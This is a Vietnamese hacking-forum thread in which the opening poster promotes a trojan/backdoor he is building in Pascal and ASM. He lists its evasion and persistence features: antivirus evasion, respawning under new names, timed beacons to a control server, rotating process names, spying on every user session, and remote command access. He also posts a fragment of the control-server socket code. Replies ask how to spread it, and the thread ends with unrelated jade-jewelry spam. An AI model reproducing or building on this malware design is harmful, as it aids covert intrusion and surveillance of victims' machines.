-
19-11-2013, 07:50 PM #1Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Lập trình virus trojan backdoor nâng cao.
Mạo muội lập topic này để anh em giao lưu chia sẻ kinh nghiệm về lập trình trojan [IMG]images/smilies/lick.gif[/IMG]
Mình xin phép giới thiệu về tính năng của con trojan mình đang xây dựng [IMG]images/smilies/2.gif[/IMG]
Ưu điểm:
-> dễ dàng cập nhật version.
-> chạy thông minh (khi nào cần sử dụng virus tự chạy ... không cần thì thôi không chạy ... khó tìm[IMG]images/smilies/wink.png[/IMG])
-> nếu virus bị phát hiện ... victim sẽ tự nhiên mọc lại con mới ở ngay chỗ mới với 1 tên gọi mới [IMG]images/smilies/lick.gif[/IMG]
-> anti virus 100% tất cả không phát hiện ra.
-> không sử dụng lib hay dll gì riêng của win vì vốn tự có nên dung lượng hơi cao. (đã test chạy ok từ win xp đến 2012 r2).
-> có thể chỉnh chế độ safe timer run , giả sử làm việc lúc 12h đêm đến 3h sáng thì trong khoảng thời gian đã định virus sẽ chạy và request về server , nếu ko đúng giờ thì nằm yên [IMG]images/smilies/biggrin.png[/IMG]
-> Trong thời gian hoạt động, virus sẽ tự động tắt nghỉ 15 phút / lần để thay đổi process name liên tục để tránh bị truy quét. thường sẽ count process nào chạy *.exe nhiều nhất thì sẽ chạy theo tên đó, lập 1 danh sách cụ thể xếp theo thứ tự vào hoán đổi vị trí theo các chu kỳ. (rõ khổ cho các bác chạy anti vir = tay ^_^!)
-> Tính năng ưa thích nhất: Virus chạy multi sessions. Giả sử không có user nào logon thì virus khi hoạt động sẽ chạy quyền cao nhất của windows, giả sử có 3 user admin, administrator, guest đang làm việc trên 1 máy, virus sẽ tự chạy cả 3 sessions thêm cái session thứ 4 cao nhất của windows -> tổng là 4. Vì vậy có thể nhìn màn hình trên mỗi user đang làm việc phân chia ra cụ thể.
Khuyết điểm:
-> size khá lớn thường là 3,5 mb.
-> do code ẩu nên còn bug vài chỗ, khổ là phải đang ngồi fix và xem lại từng dòng [IMG]images/smilies/lick.gif[/IMG]
-> tính năng chưa hoàn thiện mấy, nhưng về nhìn chung thì mình chỉ cần remote CMD thôi [IMG]images/smilies/17.gif[/IMG]
Ngôn ngữ lập trình:
-> Pascal
-> ASM
Vài hình ảnh interface cho các bạn tham khảo:
<font color="Red">Bài 1: Kết nối:
Server:
Mã:procedure FormCreate(Sender: TObject); procedure Timer1Timer(Sender: TObject); procedure ServerSocket1ClientDisconnect(Sender: TObject; Socket: TCustomWinSocket); procedure ServerSocket1ClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure Starthostserver1Click(Sender: TObject); procedure Stophostserver1Click(Sender: TObject); procedure ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket); procedure TForm1.FormCreate(Sender: TObject); var ResStream: TResourceStream; begin DeleteFile('DiaChi_IP.database'); if not FileExists('DiaChi_IP.database') then begin ResStream := TResourceStream.Create(hInstance, 'DiaChi_IP', RT_RCDATA); try ResStream.Position := 0; ResStream.SaveToFile('DiaChi_IP.database'); finally ResStream.Free; end; end; StatusBar1.Panels[0].Text := StatusBar1.Panels[0].Text + GetBuildInfoAsString; KetNoi_GS := 0; KetNoi_KT := 0; Spxp1.Click; end; procedure TForm1.FormShow(Sender: TObject); var i : Integer; begin for i := 0 to ParamCount do begin if ParamStr(i) = '/@/Khoi_dong_tat_ca/@/' then begin Starthostserver1.Click; Khingmychktni1.Click; end; end; end; procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket); begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS)); end;
View more random threads:
- Có thể decode virus(.exe) bằng tool nào?
- Khẩn cấp diệt con bot trên máy các bạn !
- Mã nguồn chương trình quyét virus viết trên VC++ 2008
- Mã nguồn virus viết bằng C(củ chuối)
- Hook winsock, bắt Link khi duyệt web như thế nào?
- Code virus viết trên VC++ hoạt động như thế nào?
- Virus conficker Rootkit, cơ chế của nó như thế nào?
- Cách chống Kill Process như thế nào?
- cơ chế tự tổng hợp và phân rã của virus image.exe
- Cách viết một con virus đơn giản?
-
23-05-2014, 03:51 PM #2Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Bác cho em hỏi 1 chút là pascal thì giao tiếp với api window kiểu gì vậy, hồi lớp 10 học mỗi turbo pascal, toàn dos.
Thank bác
-
16-10-2014, 05:42 PM #3Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Thế còn lây nhiễm và phát tán thì sao ạ? [IMG]images/smilies/clap_grin.gif[/IMG]
-
17-10-2014, 08:25 AM #4Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Rãnh giả mang luôn, sao mình thấy đối tượng theo giỏi toàn window server không vậy ? Íts khi nao thay user sài windows server lắm ... chắc cái naa`y server của bạn phải kô ?
-
30-05-2016, 11:06 AM #5Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
con này gờ còn xài được không anh?
-
01-06-2016, 01:11 PM #6Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Pascal
Mã:procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket);begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS));end;
Ngọc Bích xanh bản chất thuộc dòng đá đá hoa (jade). Và cẩm thạch là tên gọi chung của ngọc bích. Vì thực chất chúng thuộc dòng đá đa khoáng được hình thành từ chất Silicat dưới dạng dioxy. Ngọc bích...
Chia sẻ Vòng tay ngọc bích xanh là...